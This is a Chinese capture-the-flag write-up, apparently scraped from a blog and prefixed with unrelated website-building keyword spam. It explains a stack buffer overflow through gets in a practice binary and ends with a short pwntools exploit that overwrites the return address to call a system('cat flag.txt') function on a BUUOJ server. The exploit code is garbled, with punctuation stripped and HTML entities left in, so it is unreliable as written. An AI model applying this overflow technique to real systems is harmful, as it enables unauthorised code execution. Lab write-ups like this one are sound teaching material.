有阿里云服务器 怎么做网站,专业做股权众筹的网站,.net搭建企业网站,信誉好的镇江网站优化1.checksec 检查文件类型 ELF-64-little #xff0c;无其他限权#xff0c;直接用ida检查代码。 2.IDA进行反编译#xff0c;进行代码审计
查看各个名称的内容#xff1a; 了解基本攻击思路#xff1a; 攻击思路#xff1a;gets输入垃圾数据覆盖v5内容#xff0c;再将s…1.checksec 检查文件类型 ELF-64-little 无其他限权直接用ida检查代码。 2.IDA进行反编译进行代码审计
查看各个名称的内容 了解基本攻击思路 攻击思路gets输入垃圾数据覆盖v5内容再将sub_40060D的地址覆盖return_addr,使其调用“system”函数执行“cat flag.txt”,输出flag进而得到flag。
v5距离ebp大小 ebp大小 3.EXP
from pwn import *
io remote(node4.buuoj.cn,27089)
context(oslinux, archamd64, log_leveldebug)getshell0x40060D
payloadba*(0x400x8)p64(getshell)io.sendline(payload)io.interactive()因为flag是我们接收的数据所以不用交互进行cat flag.直接在返回字符内容里面查看
